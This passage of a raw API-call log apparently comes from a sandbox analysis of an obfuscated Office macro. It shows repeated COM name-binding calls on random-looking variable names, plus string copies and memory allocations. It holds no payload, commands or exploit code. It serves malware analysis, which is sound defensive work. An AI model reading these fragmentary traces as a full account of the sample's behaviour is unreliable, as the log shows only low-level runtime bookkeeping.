_Src="_B_var_IAA4AB" | out: _Dst="_B_var_IAA4AB") returned 0x0 [0069.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_IAA4AB") returned 14 [0069.304] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.304] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_IAA4AB", lHashVal=0x104107, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.304] IUnknown:Release (This=0x665ba50) returned 0xd [0069.305] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.305] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_IAA4AB", lHashVal=0x104107, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.305] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.305] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.305] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_IAA4AB", lHashVal=0x104107, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.305] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.305] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.305] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_IAA4AB", lHashVal=0x104107, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.305] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.305] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.305] IUnknown:Release (This=0x665ba50) returned 0xd [0069.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b121de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_IAA4AB") returned 14 [0069.305] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_IAA4AB", lHashVal=0x104107, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0) returned 0x0 [0069.305] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b802b6 | out: _Dst=0x144ec0) returned 0x0 [0069.305] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vAQDAQk", lHashVal=0x10193c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8028e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vAQDAQk") returned 8 [0069.305] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vAQDAQk", lHashVal=0x10193c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8028e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vAQDAQk") returned 8 [0069.305] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vAQDAQk", lHashVal=0x10193c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.305] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vAQDAQk") returned 0x10193c [0069.306] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="vAQDAQk" | out: _Dst="vAQDAQk") returned 0x0 [0069.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="vAQDAQk") returned 8 [0069.306] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.306] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vAQDAQk", lHashVal=0x10193c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.306] IUnknown:Release (This=0x665ba50) returned 0xd [0069.306] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.306] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vAQDAQk", lHashVal=0x10193c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.306] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.306] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.306] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vAQDAQk", lHashVal=0x10193c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.306] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.306] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.306] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vAQDAQk", lHashVal=0x10193c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.306] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8028e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vAQDAQk") returned 8 [0069.306] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vAQDAQk", lHashVal=0x10193c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.306] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.306] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8028e | out: _Dst=0x67c2d40) returned 0x0 [0069.306] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vAQDAQk") returned 0x101cc0 [0069.306] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_vAQDAQk" | out: _Dst="_B_var_vAQDAQk") returned 0x0 [0069.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_vAQDAQk") returned 15 [0069.306] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.306] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vAQDAQk", lHashVal=0x101cc0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.306] IUnknown:Release (This=0x665ba50) returned 0xd [0069.306] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.306] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vAQDAQk", lHashVal=0x101cc0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.306] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.307] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.307] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vAQDAQk", lHashVal=0x101cc0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.307] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.307] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.307] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vAQDAQk", lHashVal=0x101cc0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.307] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.307] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.307] IUnknown:Release (This=0x665ba50) returned 0xd [0069.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1220e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_vAQDAQk") returned 15 [0069.307] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vAQDAQk", lHashVal=0x101cc0, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.307] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8028e | out: _Dst=0x144ec0) returned 0x0 [0069.307] ITypeComp:RemoteBind (in: This=0x665ba60, szName="D_UAZBAA", lHashVal=0x10da76, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b802de, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="D_UAZBAA") returned 9 [0069.307] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="D_UAZBAA", lHashVal=0x10da76, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b802de, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="D_UAZBAA") returned 9 [0069.307] ITypeComp:RemoteBind (in: This=0x665bd30, szName="D_UAZBAA", lHashVal=0x10da76, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.307] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D_UAZBAA") returned 0x10da76 [0069.307] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="D_UAZBAA" | out: _Dst="D_UAZBAA") returned 0x0 [0069.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="D_UAZBAA") returned 9 [0069.307] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.307] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="D_UAZBAA", lHashVal=0x10da76, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.308] IUnknown:Release (This=0x665ba50) returned 0xd [0069.308] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.308] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="D_UAZBAA", lHashVal=0x10da76, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.308] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.308] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.308] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="D_UAZBAA", lHashVal=0x10da76, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.308] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.308] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.308] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="D_UAZBAA", lHashVal=0x10da76, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.308] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b802de, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="D_UAZBAA") returned 9 [0069.308] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="D_UAZBAA", lHashVal=0x10da76, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.308] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.308] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b802de | out: _Dst=0x67c2d40) returned 0x0 [0069.308] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_D_UAZBAA") returned 0x10b1ff [0069.308] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_D_UAZBAA" | out: _Dst="_B_var_D_UAZBAA") returned 0x0 [0069.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_D_UAZBAA") returned 16 [0069.308] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.308] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_D_UAZBAA", lHashVal=0x10b1ff, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.308] IUnknown:Release (This=0x665ba50) returned 0xd [0069.308] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.308] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_D_UAZBAA", lHashVal=0x10b1ff, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.308] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.308] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.308] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_D_UAZBAA", lHashVal=0x10b1ff, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.308] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.308] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.308] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_D_UAZBAA", lHashVal=0x10b1ff, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.309] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.309] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.309] IUnknown:Release (This=0x665ba50) returned 0xd [0069.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1223e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_D_UAZBAA") returned 16 [0069.309] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_D_UAZBAA", lHashVal=0x10b1ff, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x5a004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x5a004100000000, pDummy=0x0) returned 0x0 [0069.309] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b802de | out: _Dst=0x144ec0) returned 0x0 [0069.309] ITypeComp:RemoteBind (in: This=0x665ba60, szName="RAcAAAAZ", lHashVal=0x109e7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8030a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="RAcAAAAZ") returned 9 [0069.309] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="RAcAAAAZ", lHashVal=0x109e7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8030a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="RAcAAAAZ") returned 9 [0069.309] ITypeComp:RemoteBind (in: This=0x665bd30, szName="RAcAAAAZ", lHashVal=0x109e7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.309] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RAcAAAAZ") returned 0x109e7c [0069.309] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="RAcAAAAZ" | out: _Dst="RAcAAAAZ") returned 0x0 [0069.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="RAcAAAAZ") returned 9 [0069.309] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.309] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="RAcAAAAZ", lHashVal=0x109e7c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.309] IUnknown:Release (This=0x665ba50) returned 0xd [0069.309] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.309] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="RAcAAAAZ", lHashVal=0x109e7c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.309] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.309] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.309] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="RAcAAAAZ", lHashVal=0x109e7c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.310] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.310] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.310] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="RAcAAAAZ", lHashVal=0x109e7c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.310] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.310] IMalloc:Realloc (This=0x7fefec05380, pv=0x646f830, cb=0x60) returned 0x69503b0 [0069.310] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0xa670000 [0069.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8030a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="RAcAAAAZ") returned 9 [0069.310] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="RAcAAAAZ", lHashVal=0x109e7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.311] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.311] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8030a | out: _Dst=0x67c2d40) returned 0x0 [0069.311] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_RAcAAAAZ") returned 0x107605 [0069.311] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_RAcAAAAZ" | out: _Dst="_B_var_RAcAAAAZ") returned 0x0 [0069.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_RAcAAAAZ") returned 16 [0069.311] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.311] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_RAcAAAAZ", lHashVal=0x107605, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.311] IUnknown:Release (This=0x665ba50) returned 0xd [0069.311] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.311] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_RAcAAAAZ", lHashVal=0x107605, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.311] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.311] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.311] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_RAcAAAAZ", lHashVal=0x107605, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.311] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.311] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.311] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_RAcAAAAZ", lHashVal=0x107605, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.311] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.311] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.311] IUnknown:Release (This=0x665ba50) returned 0xd [0069.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1226e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_RAcAAAAZ") returned 16 [0069.311] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_RAcAAAAZ", lHashVal=0x107605, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.311] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8030a | out: _Dst=0x144ec0) returned 0x0 [0069.311] ITypeComp:RemoteBind (in: This=0x665ba60, szName="i1_UZGA", lHashVal=0x1027f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8035e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="i1_UZGA") returned 8 [0069.312] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="i1_UZGA", lHashVal=0x1027f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8035e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="i1_UZGA") returned 8 [0069.312] ITypeComp:RemoteBind (in: This=0x665bd30, szName="i1_UZGA", lHashVal=0x1027f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.312] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i1_UZGA") returned 0x1027f0 [0069.312] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="i1_UZGA" | out: _Dst="i1_UZGA") returned 0x0 [0069.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="i1_UZGA") returned 8 [0069.312] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.312] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="i1_UZGA", lHashVal=0x1027f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.312] IUnknown:Release (This=0x665ba50) returned 0xd [0069.312] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.312] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="i1_UZGA", 